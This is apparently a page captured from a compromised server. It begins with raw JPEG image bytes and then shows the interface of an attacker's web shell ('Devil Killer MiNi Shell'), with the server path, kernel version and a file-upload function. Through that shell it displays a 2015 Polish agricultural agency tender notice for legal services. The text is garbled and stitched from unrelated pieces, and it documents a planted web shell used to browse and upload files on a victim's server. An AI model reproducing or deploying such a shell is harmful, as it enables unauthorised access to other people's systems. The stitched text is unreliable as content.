JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151007/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151007/264698-N-2015.html

<p class="kh_header"><b>Warszawa: Świadczenie obsługi prawnej dla Oddziałów Terenowych Agencji Rynku Rolnego</b><br>
<b>Numer ogłoszenia: 264698 - 2015; data zamieszczenia: 07.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rynku Rolnego , ul. Karolkowa 30, 01-207 Warszawa, woj. mazowieckie, tel. 22 661 72 72, faks 22 376 73 79.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja płatnicza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie obsługi prawnej dla Oddziałów Terenowych Agencji Rynku Rolnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. CPV: 79.10.00.00-5 (Usługi prawnicze).
2. Przedmiotem zamówienia jest świadczenie obsługi prawnej dla Oddziałów Terenowych Agencji Rynku Rolnego w Gorzowie Wlkp., Krakowie, Lublinie, Opolu i Rzeszowie określonej w ustawie z dnia 6 lipca 1982 r. o radcach prawnych (Dz. U. z 2010 r. Nr 10, poz. 65, z późn. zm.) / w ustawie z dnia 26 maja 1982 r. Prawo o adwokaturze (Dz. U. z 2009 r. Nr 146, poz. 1188 z późn. zm.), a w szczególności do:
1) świadczenia w imieniu i na rzecz ARR zastępstw procesowych w postępowaniach: sądowym, administracyjnym i przed innymi organami orzekającymi;
2) doradztwa prawnego w zakresie zastępstwa procesowego oraz konsultowania 
z Zamawiającym taktyki postępowania;
3) oceny zasadności kontynuowania sporu w postępowaniu sądowym lub przed innym organem, oceny zasadności zawarcia ugody;
4) sporządzania wniosków, pozwów, odwołań, apelacji i innych pism procesowych 
w sprawach sądowych, administracyjnych i przed innymi organami orzekającymi;
5) sporządzania sprawozdań z realizacji zastępstw procesowych świadczonych na rzecz ARR- każdorazowo po rozprawie (posiedzeniu) lub innej czynności dokonanej w danej sprawie, a ponadto okresowo, z częstotliwością raz na kwartał, a przypadku gdy nie nastąpiły zmiany w stanie sprawy nie rzadziej niż raz na rok i przekazywania ich do wiadomości Dyrektorowi Oddziału oraz Dyrektorowi Biura Prawnego w Centrali ARR;
6) sporządzania opinii prawnych, udzielania porad prawnych i wyjaśnień w sprawach dotyczących stosowania przepisów prawa;
7) opiniowania pod względem prawnym projektów decyzji i innych rozstrzygnięć administracyjnych Dyrektora Oddziału;
8) współdziałania w opracowywaniu zawieranych przez Oddział projektów umów;
9) uczestniczenia w postępowaniu egzekucyjnym oraz w procesie windykacji wierzytelności ARR związanych z działalnością Oddziału;
10) sygnalizowania Dyrektorowi Oddziału zmian stanu prawnego i - stosownie do potrzeb - inicjowania modyfikacji sposobu postępowania, przyjętego w Oddziale.
3. Szczegółowy opis przedmiotu zamówienia zawarty został w załączniku nr 6 do SIWZ (Istotne Postanowienia Umowy - IPU).
4. Ze względu na specyfikę przedmiotu zamówienia, zgodnie z art. 36a ust. 2 pkt 1 ustawy, Zamawiający zastrzega, że kluczowe części w ramach danego zadania częściowego, nie mogą być powierzone podwykonawcom (z zastrzeżeniem art. 36a ust. 3 ustawy).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu (dla wszystkich zadań częściowych), jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje, co najmniej 1 (jedną) usługę polegającą na obsłudze prawnej w charakterze radcy prawnego bądź adwokata w jednostce administracji publicznej w zakresie stosowania przepisów Wspólnej Polityki Rolnej, trwającą przez okres minimum 10 miesięcy o wartości co najmniej 20.000,00 zł (słownie: dwadzieścia tysięcy złotych) brutto.
UWAGA: W przypadku podania wartości usług w walucie innej niż PLN, w celu oceny spełniania ww. warunku Zamawiający dokona przeliczenia wskazanej kwoty na PLN według średniego kursu Narodowego Banku Polskiego obowiązującego w dniu publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu (dla zadań częściowych nr 1 - 5), jeżeli osoba która będzie uczestniczyć w wykonywaniu zamówienia posiada uprawnienia radcy prawnego/adwokata z co najmniej 60 miesięcznym doświadczeniem w obsłudze prawnej jednostek administracji publicznej stosujących przepisy prawa rolnego, Wspólnej Polityki Rolnej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Doświadczenie - 35</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności, w szczególności:
a) w przypadku zmiany siedziby Oddziału Terenowego, miejscem świadczenia i realizacji przedmiotu Umowy będzie nowy adres siedziby Oddziału Terenowego;
b) w przypadku zmiany Wytycznych Bezpieczeństwa Informacji dla Kontrahentów i osób zewnętrznych, wiążąca będzie nowa treść ww. dokumentu, pod warunkiem przekazania jej treści w formie pisemnej lub co najmniej na podany adres poczty elektronicznej Wykonawcy:...@...;
c) zmiana związana z warunkami płatności może dotyczyć przesunięcia terminu płatności należnej za wykonanie przedmiotu Umowy, o którym mowa w § 1, o okres niezbędny do uzyskania środków finansowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rynku Rolnego, ul. Karolkowa 30, 01-207 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2015 godzina 12:00, miejsce: Siedziba Agencji Rynku Rolnego w Warszawie, w Kancelarii ARR, wejście główne, pietro I.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Wykonawca zobowiązany jest do wskazania w pkt. 4 załącznika nr 1 do SWIZ (Formularz ofertowy) 1 osobę (słownie: jedną), która wykonywać będzie przedmiot zamówienia. Brak wypełnienia przez Wykonawcę pkt. 4-5 Załącznika nr 1 do SIWZ (Formularz ofertowy) spowoduje odrzucenie oferty.
2. Zamawiający w kryteriach dotyczących doświadczenia dokona oceny ofert na podstawie właściwości wykonawcy tj. oceni doświadczenie 1 (słownie: jednej) osoby, która wykonywać będzie przedmiot zamówienia.
3. Zamawiający dokona wyboru Wykonawcy zamówienia dla każdej części zamówienia wskazanej w rozdziale III niniejszej SIWZ w oparciu o niżej wymienione kryteria oceny:
a) wyrażona w złotych cena brutto - waga: 65 %;
Liczba punktów w tym kryterium będzie obliczana wg następującego wzoru:
Cmin C = -------------------------------------- x 65 Cbad
C - ilość punktów w kryterium cena; Cmin - cena najniższa spośród ważnych ofert w danym zadaniu częściowym; Cbad - cena oferty badanej w danym zadaniu częściowym.
b) doświadczenie - waga: 35%, na które składają się:
- Doświadczenie osoby, która wykonywać będzie przedmiot zamówienia w obsłudze prawnej jednostek administracji publicznej stosujących przepisy prawa rolnego, Wspólnej Polityki Rolnej - waga: 25 %;
- Doświadczenie osoby, która wykonywać będzie przedmiot zamówienia w stosowaniu przepisów prawa na rzecz agencji płatniczej Unii Europejskiej - waga: 10%.
W części kryterium Doświadczenie osoby, która wykonywać będzie przedmiot zamówienia w obsłudze prawnej jednostek administracji publicznej stosujących przepisy prawa rolnego, Wspólnej Polityki Rolnej - waga: 25%, maksymalna ilość punktów: 25 (D1).
Wykonawca otrzyma następującą liczbę punktów - w zależności od tego, jak długi okres posiadanego doświadczenia wykaże:
do 60 miesięcy - 0 pkt,
od 61 miesięcy - do 70 miesięcy -   5 pkt,
od 71 miesięcy - do 80 miesięcy - 10 pkt, 
od 81 miesięcy i więcej - 25 pkt
W części kryterium Doświadczenie osoby, która wykonywać będzie przedmiot zamówienia w stosowaniu przepisów prawa na rzecz agencji płatniczej Unii Europejskiej - 10%, maksymalna ilość punktów: 10 (D2)
Wykonawca otrzyma następującą liczbę punktów - w zależności od tego, jak długi okres posiadanego doświadczenia wykaże:
do 20 miesięcy - 0 pkt,
od 21 miesięcy - do 35 miesięcy - 5 pkt, 
od 36 miesięcy i więcej - 10 pkt
4. Punktacje będą zaokrąglane z dokładnością do dwóch miejsc po przecinku.
5. Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów, obliczoną według wzoru: P = C + D1 + D2 
gdzie:
P - całkowita ilość punktów przyznanych ocenianej ofercie;
C - ilość punktów w kryterium cena;
D1 - ilość punktów w kryterium Doświadczenie w obsłudze prawnej jednostek administracji publicznej związanych ze stosowaniem przepisów prawa rolnego, Wspólnej Polityki Rolnej;
D2 - ilość punktów w kryterium Doświadczenie osoby, która wykonywać będzie przedmiot zamówienia w stosowaniu przepisów prawa na rzecz agencji płatniczej Unii Europejskiej.
6. Badania i oceny ofert dokona komisja przetargowa powołana przez Zamawiającego, w oparciu o wymagania postawione w SIWZ.
UWAGA!!! Przez obsługę prawną jednostek administracji publicznej należy rozumieć administrację rządową (administracja rządowa centralna: Prezes Rady Ministrów, Rada Ministrów, ministrowie i centralne organy administracji rządowej oraz administracja rządowa terenowa: wojewoda i podległe mu służby, organy administracji niezespolonej), administrację samorządową (sejmik województwa, rada powiatu, rada gminy, marszałek i zarząd województwa, starosta i zarząd powiatu, wójt, burmistrz, prezydent), administrację państwową (np. Prezydent Rzeczypospolitej Polskiej, organy Najwyższej Izby Kontroli, Krajowa Rada Radiofonii i Telewizji, Rzecznik Praw Obywatelskich, Krajowa Rada Sądownictwa, organy Narodowego Banku Polskiego, w tym Krajowa Rada Polityki Pieniężnej, centralne organy administracji podległe Sejmowi) oraz państwowe osoby prawne.
Pod pojęciem prawa rolnego należy rozumieć całokształt norm prawnych prawa krajowego i UE regulujących kształtowanie się ustroju rolnego, w tym także produkcji rolnej i rynku rolnego a także zespół instytucji i rozwiązań prawnych o charakterze szczególnym, podyktowanym specyfiką rolnictwa objętych Wspólną Polityką Rolną.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Oddział Terenowy ARR w Gorzowie Wlkp.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się do pełnienia dyżuru w siedzibie Oddziału, w wymiarze 10 godzin tygodniowo.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doświadczenie - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Oddział Terenowy ARR w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się do pełnienia dyżuru w siedzibie Oddziału, w wymiarze 10 godzin tygodniowo.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doświadczenie - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Oddział Terenowy ARR w Lublinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się do pełnienia dyżuru w siedzibie Oddziału, w wymiarze 12 godzin tygodniowo.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doświadczenie - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Oddział Terenowy ARR w  Opolu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się do pełnienia dyżuru w siedzibie Oddziału, w wymiarze 10 godzin tygodniowo.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doświadczenie - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Oddział Terenowy ARR w Rzeszowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się do pełnienia dyżuru w siedzibie Oddziału, w wymiarze 5 godzin tygodniowo.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doświadczenie - 35</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com